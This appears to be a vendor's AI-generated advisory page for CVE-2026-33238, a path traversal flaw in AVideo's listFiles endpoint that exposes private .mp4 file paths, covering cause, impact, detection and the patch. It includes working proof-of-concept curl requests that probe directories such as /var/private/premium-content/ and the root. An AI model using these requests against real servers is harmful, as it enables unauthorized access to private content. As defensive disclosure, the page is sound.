
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-33238 is a path traversal vulnerability in WWBN AVideo's listFiles.json.php endpoint that enables authenticated uploaders to enumerate private, premium, or access-controlled .mp4 files stored anywhere on the server filesystem. It affects AVideo versions up to and including 25.0 (Composer package wwbn/avideo), with version 26.0 containing the fix. The vulnerability was published on March 18, 2026, and assigned a CVSS v3.1 base score of 4.3 (Medium) (GitHub Advisory, AVideo Security Advisory).
The root cause is CWE-22 (Improper Limitation of a Pathname to a Restricted Directory). The vulnerable code in objects/listFiles.json.php accepts a user-supplied path POST parameter and passes it directly to PHP's glob() function without calling realpath() for normalization or performing any prefix check against a permitted base directory. Because the response includes the full absolute filesystem path ($obj->path) of each matched .mp4 file, an attacker can supply arbitrary absolute paths (e.g., /var/private/premium-content/ or /) to enumerate .mp4 files anywhere readable by the web server process. Exploitation requires only a valid session with canUpload permission, which is the standard role granted to all registered video uploaders on a multi-user AVideo instance (GitHub Advisory, AVideo Security Advisory).
Successful exploitation allows any authenticated uploader to discover the filenames and full absolute filesystem paths of private, premium, or paywalled .mp4 files stored outside their permitted directory, effectively bypassing content access controls. The disclosure of full absolute paths also reveals the server's directory layout, which can facilitate follow-up attacks if additional vulnerabilities (e.g., direct file access or further path traversal weaknesses) are present. There is no integrity or availability impact; the vulnerability is limited to confidentiality loss affecting media content and server structure information (GitHub Advisory).
A proof-of-concept exploit consisting of concrete curl commands is publicly available in the GitHub Security Advisory (AVideo Security Advisory). There is no evidence of in-the-wild exploitation at this time, and the vulnerability has not been added to the CISA Known Exploited Vulnerabilities catalog. The EPSS score is approximately 0.036% (0.018% per GitHub Advisory), reflecting a low near-term exploitation probability. No threat actor attribution has been reported.
canUpload permission — the standard role for all video uploaders on a multi-user instance.PHPSESSID session cookie./listFiles endpoint with the intended upload directory to confirm the endpoint is functional:curl -b "PHPSESSID=<session>" -X POST https://target.avideo.site/listFiles \
-d "path=/var/www/html/videos/".mp4 files:curl -b "PHPSESSID=<session>" -X POST https://target.avideo.site/listFiles \
-d "path=/var/private/premium-content/"The response returns full absolute paths such as /var/private/premium-content/paywalled-video.mp4..mp4 files visible to the web server process:curl -b "PHPSESSID=<session>" -X POST https://target.avideo.site/listFiles \
-d "path=/"/listFiles (or /objects/listFiles.json.php) with path parameter values pointing to directories outside the AVideo web root (e.g., /var/private/, /home/, /etc/, /).listFiles endpoint from a single authenticated session with varying path values; HTTP 200 responses to requests with non-standard path values.path parameters containing absolute paths not matching the configured systemRootPath . 'videos' directory.path fields referencing filesystem locations outside the expected video upload directory (AVideo Security Advisory).Upgrade AVideo to version 26.0 or later, which resolves the vulnerability by using realpath() to normalize the supplied path and rejecting any path that does not begin with the permitted base directory ($global['systemRootPath'] . 'videos/'), returning HTTP 403 for disallowed paths (AVideo Patch Commit). As a complementary measure, restrict canUpload permissions to trusted users only on multi-user deployments, and ensure premium or private video files are stored in directories protected by OS-level access controls that prevent the web server process from reading them. Implementing filesystem-level access controls provides defense-in-depth even if the application-level fix is applied (GitHub Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."